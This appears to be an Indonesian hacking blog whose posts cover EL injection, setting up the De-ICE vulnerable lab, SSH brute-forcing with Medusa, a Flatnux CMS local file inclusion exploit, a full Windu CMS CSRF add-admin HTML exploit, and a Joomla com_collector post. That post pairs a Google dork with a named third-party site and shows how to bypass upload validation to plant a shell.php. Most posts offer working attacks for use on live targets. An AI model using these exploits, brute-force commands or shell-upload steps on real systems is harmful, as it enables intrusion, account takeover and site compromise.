El Injection

06:29 |


El injection(Expression Language Injection)

Apa itu Expression language : expression language adalah bahasa pemrograman bertujuan khusus untuk dengan mudah mengakses data aplikasi yang tersimpan di Java Beans components,system objects,managing application,devices and services. Mereka digunakan untuk embedding ekspresi seperti aritmatika dan ekspresi logis dalam halaman web.
Admin menggunakannya untuk melakukan tugas-tugas seperti membaca data, menulis data, dll
Siapa yang menemukan El Injection ? Sir Stefano Di Paola, adalah orang yang menemukan kerentanan yang menarik ini pada tahun 2011.
Jadi, sekarang Anda mungkin sudah menebak apa yang dapat dilakukan dengan injeksi EL. Aplikasi ditargetkan memutuskan lingkup kerentanan.
Memanfaatkan kerentanan yang dapat memberikan hasil dengan XSS, RCE dan juga dapat mengambil data dari database! Kerentanan terjadi ketika sebuah aplikasi web adalah menjalankan versi lama dari clearspace yang sekarang dikenal sebagai Jive Software.
Clearspace adalah alat manajemen pengetahuan dan terintegrasi dengan Spring Framework.
Clearspace rentan terhadap bug ini karena pola EL digunakan dalam JSP Tag.
Bagaimana cara penyerangannya ? contohnya seperti ini
kita kirim dengan get unauth dan kita isi proses aritmatika 100 x 3 https://target-site/login!input.jspa?unauth=${100*3}. dan nanti pada source nya akan muncul hasil dari 100*3
s652sx

dan kita coba dengan query yang lain  https://target-site/login!input.jspa?unauth=${99999+1}
oye
dari hasil seperti ini mungkin bisa di explore sampai bisa maitening access atau sebagainya
bagaimana cara patching ?
yang harus di lakukan adalah update
Sources : https://evilzone.org/tutorials/el-injection
Read more…

Vulnerable By Design De-Ice

22:22 |
Install De-ice for Virtual Hacking Lab , apa itu De-Ice ? hackingdojo.com

[hide]
singkatnya de-ice adalah vulnerability yang sudah di desain untuk bahan pembelajaran seperti pwnOs , kioptrix dan lain-lain . nah de-ice ini ada 3 level kalian bissa download iso nya di sini sourceforge.net/projects/virtualhacking/files/os/de-ice

apa yang di butuhkan untuk install de-ice kalau ane menggunakan linux backbox jadi install vmware workstation linux x86_64 buat 64 bit di sini https://www.vmware.com/go/downloadworkstation

 untuk download vmware kalian harus buat akun terlebih dahulu,pilih paket installasi yang sesuai dengan komputer nya . untuk windows install seperti biasa , untuk linux gunakan command

Quote:


nanti munul GUI dan install vmware seperti biasa , setelah selesai install vmware buka vmware dan konfigurasi jaringannya

pilih Edit > virtual network

+ Add network > vmnet 2 > Host Only > Subnet 192.168.1.2

DHCP = Yes

Quote:


setelah selesai configurasi network , kita install de-ice pilih
  • File > New virtual Machine
  • Typical (Recomended) > Next
  • Use Iso Image > de-ice.iso > Next
  • Linux > Other Linux 2.6.x Kernel > Next
  • Name and location default > next
  • Split > next
  • Custumize hardware > Network Adapter > Custom Specified > vmnet2
  • Finish
run your vmware machine

Quote:


masuk ke terminal dan ketik command ini



Quote:netdiscover -r 192.168.1.0/24 -i vmnet2

[/hide]

nanti akan muncul ip dari vmware nya yang sedang jalanin machine De-Ice

mungkin dapat <strong>192.168.1.100  </strong>kalau sudah bisa di akses server siap untuk di pentest

Quote:


My Website
Thanks : hackingdojo , muhammad alim , eric draven , double-dragon
Read more…

Breaking into SSH using Medusa

03:43 |
Kebetulan belum ada yang membahas tools Medusa, so. saya coba bahas ya =)

Keterangan:
SSH Atau Secure Shell adalah sebuah protokol jaringan di mana klien dapat bertukar data melalui jaringan yang aman antara dua perangkat sebagai jaringan remote. hal ini banyak digunakan dalam Operasi sistem GNU Linux dan Unix.

Medusa:
medusa adalah alat BruteForce dengan pelayanan yang cepat untuk menampilkan password "SSH,FTP,HTTP,MySQL,Telnet, VNC dan banyak lagi.

Equipments :
1. medusa
2. Nmap


Scan ip yang menjadi target kita menggunakan Nmap

Code:
# nmap -sV xxx.xxx.xxx
-sV Probe open ports to determine service/version info
xxx.xxx.xxx.xxx : ip-victim

terlihat pada gambar diatas, port 22 service ssh terbuka jadi sangat besar kemungkinan kita dapat melakukan pengeksploitasian =)

selanjutnya kita BruteForce menggunakan Medusa untuk mengetahui username dan password victim:

Code:
# medusa -h xxx.xxx.xxx.xxx -U USER.txt -P PASS.txt -e ns -M ssh -v 4

-h : Target hostname or IP address
-U : File containing usernames
-P : File containing passwords
-e : Additional password checks ([n] No Password, [s] Password = Username)
-M : Name of the module to execute
-v Verbose level
Spoiler! : 




ACCOUNT FOUND rolling on the floor
Username = root
Password = r00t

sekarang mari kita login 

Code:
# ssh root@xxx.xxx.xxx.xxx


Sukses rolling on the floor 

CATATAN: pada dasarnya tidak semudah seperti dalam pengujian yang saya lakukan, bahwa Anda harus mempersiapkan wordlist yang besar serta keberuntungan yang berpihak kepada anda =)

Regards IBT
http://indonesianbacktrack.or.id/forum/thread-5035.html
Read more…

Flatnux CMS Local File Inclusion

05:05 |

##########################################
[~] Exploit Title: Flatnux CMS Local File Inclusion
[~] Date: 21-03-2013 
[~] Author: DaOne aka Mocking Bird 
[~] Vendor Homepage: http://flatnux.altervista.org/ 
[~] Software Link: http://flatnux.altervista.org/download.html?f=Flatnux-Next/flatnux-2013-01.17.zip 
[~] Category: webapps/php 
[~] Version: 2013-01.17 
[~] Tested on: Apache/2.2.8(Win32) PHP/5.2.6 
##########################################
# Exploit 
index.php?theme={localfile}{nullbyte} http://localhost/flatnux/index.php?theme=../../../../../../../../../../windows/win.ini 
# References
http://www.exploit-id.com/web-applications/flatnux-cms-local-file-inclusion#sthash.HwM1yoOk.dpuf
Read more…

Windu CMS 2.2 CSRF Add Admin Exploit

05:00 |

Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 24.07.2013
Tested On
Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.7
MySQL 5.5.25a 
Release Date: 24.07.2013
Summary
Windu CMS is a simple, lightweight and fun-to-use website content management software.
Description
Windu CMS suffers from a cross-site request forgery vulnerabilities. The application allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site.
<!--
Windu CMS 2.2 CSRF Add Admin Exploit
Vendor: Adam Czajkowski
Product web page: http://www.windu.org
Affected version: 2.2 rev 1430
Summary: Windu CMS is a simple, lightweight and fun-to-use
website content management software.
Desc: Windu CMS suffers from a cross-site request forgery
vulnerabilities. The application allows users to perform
certain actions via HTTP requests without performing any
validity checks to verify the requests. This can be exploited
to perform certain actions with administrative privileges
if a logged-in user visits a malicious web site.
User type:
value 17 - Admin Main (form_key = addUserSystem)
value 9 - Administrator (form_key = addUserSystem)
value 18 - Content (form_key = addUserSystem)
value 19 - Editor (form_key = addUserSystem)
value 14 - Page User (form_key = addUserPage)
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
Apache 2.4.2 (Win32)
PHP 5.4.7
MySQL 5.5.25a
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2013-5149
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5149.php
21.07.2013
-->
<html>
<head>
<title>Windu CMS 2.2 CSRF Add Admin Exploit</title>
</head>
<body><center><br />
<form method="POST" action="http://localhost/winducms/admin/users/?mn=admin.message.error">
<input type="hidden" name="type" value="9" />
<input type="hidden" name="email" value="evil@hacker.net" />
<input type="hidden" name="password" value="0bl1viON" />
<input type="hidden" name="passwordCompare" value="0bl1viON" />
<input type="hidden" name="username" value="hax0r" />
<input type="hidden" name="name" value="XSRF" />
<input type="hidden" name="surname" value="PoC" />
<input type="hidden" name="form_key" value="addUserSystem" />
<input type="submit" value="Forge!" />
</form>
</body>
</html>

References
[1] http://www.securityfocus.com/bid/61429
[2] http://cxsecurity.com/issue/WLB-2013070187
[3] http://packetstormsecurity.com/files/122539
[4] http://secunia.com/advisories/54237/
[5] http://www.securelist.com/en/advisories/54237
[6] http://www.osvdb.org/show/osvdb/95636
[7] http://www.exploit-db.com/exploits/27128/ 
Read more…

Browser Ente Tools Berbahaya Loh !!

08:28 |
  

Sekarang ane mau berbagi tentang rahasia dibalik kejamnya browser ente om.. hiks hiks... yh gk se-EXTREME yg ente bayangin sih om, tp klo om-om ini bisa pada ngembangin bisa jd tools yg sangat berbahaya... #jgn lebay deh om awed, please... hehehe...
   Sekarang kita coba testing dengan memanfaatkan kelemahan joomla V 1.5 yg menggunakan com_collector. Syarat, Browser Firefox, koneksi internet, kopi n cemilan deh... buka google.co.id, lalu ketikkan dork ini,,,
Dork >> inurl:index.php?option=com_collector
POC/Exploit >> http://localhost/[path]/index.php?option=com_collector&view=filelist&tmpl= component&folder=&type=1
   misal kita dapet >> http://www.sris.com.kg/index.php?option=com_collector&view=collection&id=2&Itemid=22&lang=en lalu kita rubah menjadi >> http://www.sris.com.kg/index.php?option=com_collector&view=filelist&tmpl=%20component&folder=&type=1
 inilah screenshot-nya >>

   lalu tekan ctrl + shift + i untuk membuka browser inspector sebagai tools / alat bantu kita om... lalu arahkan pointer ke tombol submit uploadnya...
 
  lalu rubah bagian coding ini...
<input type="button" value="Start upload" onclick="javascript:if(document.adminForm.fileupload.value==''){alert('Veuillez sélectionner un fichier');}else{  submitbutton('upload')}"></input>
</div>
</td></tr>
</tbody>
</table>
<input type="hidden" value="com_collector" name="option"></input>
<input type="hidden" value="filelist" name="view"></input>
<input type="hidden" value="component" name="tmpl"></input>
<input type="hidden" value="" name="task"></input>
<input type="hidden" value="" name="folder"></input>
<input type="hidden" value="filemanager" name="controller"></input>
 
   menjadi...
<input type="submit" value="Start upload" onclick=""></input>
</div>
</td>
</tr>
</tbody>
</table>
<input type="hidden" value="com_collector" name="option"></input>
<input type="hidden" value="filelist" name="view"></input>
<input type="hidden" value="component" name="tmpl"></input>
<input type="hidden" value="upload" name="task"></input>
<input type="hidden" value="" name="folder"></input>
<input type="hidden" value="filemanager" name="controller"></input>




   lihat kan om perbedaan yg udah kita kasih, nah sekarang om bisa bedain kan coding javascript validasinya udah kita rubah, om-om skrg bisa upload shell.php langsungtanpa ragu-ragu lagi... hehe... klo udah di upload om bisa buka di alamat site.com/[nama shel.php om] karena type hidden yg nama folder yg ane stabillo hijau itu kita kosongkan, artinya file shell.php kita upload di folder utama site tersebut, kalo diisi yang lain yh berarti kasih slash sesuai folder yg ente kasih om baru akhiri url nya dengan /[shell.php]... 
   hehe bahaya kan om,,, nah sekarang ane lg cari buat script yang lebih bahaya lagi om.. hehe saling share ajah yah om... om-om jg bisa oprek web lain dg inspector tersebut... silakan ajah deh om oprek dengan logika om, syukur-syukur om-om dpt cara baru... hehe makasih yah sebelumnya buat IBT Crew & ZEUS TEAM...

    mohon kritik n saran yah om ke ane apabila ada kesalahan, kekurangan atau kelebihan. ane juga minta maaf apabila ane nyinggung om secara gak sengaja melalui postingan ini, hehe namanya juga gak sengaja om...

    okay, sekian dulu dari om Awed, sampai ketemu dalam postingan berikutnya. SALAM IBT OM-OM SEMUA...
Read more…

Followers

Total Tayangan Laman